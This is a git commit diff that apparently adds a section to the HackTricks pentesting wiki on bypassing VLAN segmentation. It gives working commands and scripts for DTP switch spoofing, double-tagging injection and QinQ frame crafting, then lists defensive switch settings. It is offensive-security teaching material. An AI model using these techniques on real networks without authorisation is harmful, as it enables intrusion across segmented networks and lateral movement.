mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1149 from HackTricks-wiki/research_update_src_generic-methodologies-and-resources_pentesting-network_lateral-vlan-segmentation-bypass_20250718_014054
Research Update Enhanced src/generic-methodologies-and-resou...
This commit is contained in:
commit
0b32458cbe
@ -60,11 +60,84 @@ Connectivity is tested by initiating ICMP requests to the default gateways for V
|
|||||||
|
|
||||||
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
|
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Other VLAN-Hopping Techniques (no privileged switch CLI)
|
||||||
|
|
||||||
|
The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a **regular access port**. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:
|
||||||
|
|
||||||
|
### 1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)
|
||||||
|
|
||||||
|
Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single **DTP “desirable”** or **“trunk”** frame converts the access port into an 802.1Q trunk that carries *all* allowed VLANs.
|
||||||
|
|
||||||
|
*Yersinia* and several PoCs automate the process:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Become a trunk using Yersinia (GUI)
|
||||||
|
$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking
|
||||||
|
|
||||||
|
# Python PoC (dtp-spoof)
|
||||||
|
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
|
||||||
|
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
|
||||||
|
```
|
||||||
|
|
||||||
|
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo modprobe 8021q
|
||||||
|
sudo ip link add link eth0 name eth0.30 type vlan id 30
|
||||||
|
sudo ip addr add 10.10.30.66/24 dev eth0.30
|
||||||
|
sudo ip link set eth0.30 up
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. Double-Tagging (Native-VLAN Abuse)
|
||||||
|
|
||||||
|
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
python3 DoubleTagging.py \
|
||||||
|
--interface eth0 \
|
||||||
|
--nativevlan 1 \
|
||||||
|
--targetvlan 20 \
|
||||||
|
--victim 10.10.20.24 \
|
||||||
|
--attacker 10.10.1.54
|
||||||
|
```
|
||||||
|
|
||||||
|
Packet walk-through:
|
||||||
|
1. Outer tag (1) is stripped by the first switch because it matches the native VLAN.
|
||||||
|
2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
|
||||||
|
|
||||||
|
The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .
|
||||||
|
|
||||||
|
### 3. QinQ (802.1ad) Stacking
|
||||||
|
|
||||||
|
Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from scapy.all import *
|
||||||
|
outer = 100 # Service tag
|
||||||
|
inner = 30 # Customer / target VLAN
|
||||||
|
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
|
||||||
|
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
|
||||||
|
sendp(frame, iface="eth0")
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Defensive Recommendations
|
||||||
|
|
||||||
|
1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
|
||||||
|
2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`.
|
||||||
|
3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
|
||||||
|
4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
|
||||||
|
5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||||
|
- VLANPWN attack toolkit – <https://github.com/casterbytethrowback/VLANPWN>
|
||||||
|
- Twingate "What is VLAN Hopping?" (Aug 2024) – <https://www.twingate.com/blog/glossary/vlan%20hopping>
|
||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user